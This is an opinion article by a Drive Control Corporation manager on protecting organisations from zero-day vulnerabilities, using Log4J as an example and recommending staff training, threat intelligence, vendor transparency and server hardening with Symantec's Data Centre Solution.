WatchGuard Threat Lab’s recent Internet Security Report cites that 78% of zero-day malware threats evade basic detection. This trend was also seen in previous quarters, which makes a solid case for taking immediate step to safeguard organisations against zero-day vulnerabilities.
By Fred Mitchell, division manager: software solution at Drive Control Corporation (DCC)
The goal post has moved, attackers are now targeting unknown vulnerabilities on web servers, Microsoft Exchange, and remote access software. The top 20 exploits blocked by Symantec in 2021 were all targeted at servers.
A real-life example is Log4J, a widely used Java-based logging utility on web servers. Discovered in December 2021, attackers were so focused on taking advantage of this new vulnerability in Log4J that by the end of the month Symantec had blocked more attacks on the logging utility than any other vulnerability in 2021.
Patch management is critical, however, if the developer of the software is not aware of the vulnerability, attackers can create havoc before the weak point is fixed. To this end, organisations must take additional steps to mitigate the potential threats from zero-day vulnerabilities.
Employee Training
Unfortunately end users are still being targeted. And whilst not so prevalent as a few years ago, it is still vital that employees are provided with the proper training to recognise threats such as phishing and social engineering ruses.
The warning remains the same; it only takes one click on an e-mail or visit to a compromised website, now combined with vulnerability exploit, to spread malicious software throughout the corporate network.
Threat Intelligence
The Threat Intelligence landscape is undoubtedly mature and offers a wide array of features. However, it is important not to forget vulnerabilities. Your Threat Intelligence solution must be able to alert you of any software vulnerabilities; this will go a long way in ensuring organisations don’t fall victim to a zero-day threat.
Transparency
We will never have bug-free software, however, does your vendor of choice have a simple and user-friendly way of reporting vulnerabilities? Also, how do they release patches when vulnerabilities are detected?
The next step is to ask about their secure coding practices and how are you protected against a supply chain attack? Secure coding is an evolving discipline, therefore, invest in a plan that’s focused on constant, incremental improvements.
Fortify your servers
As mentioned, cyber criminals’ attack strategy is now firmly set on servers. More than ever, servers must be hardened against zero-day attacks. Whichever way you look at it, a server is the gateway into an organisation and stores sensitive information.
A Data Centre Solution (DCS) can protect servers before patches are deployed. For example, Symantec’s DCS had multiple policies in place preventing Log4J, or any other vulnerability, from being exploited on installed servers.
Ultimately, a DCS delivers comprehensive server protection, providing visibility, compliance, monitoring, and management for a broad array of OSs and legacy servers. It is very important step in preventing zero-day vulnerability.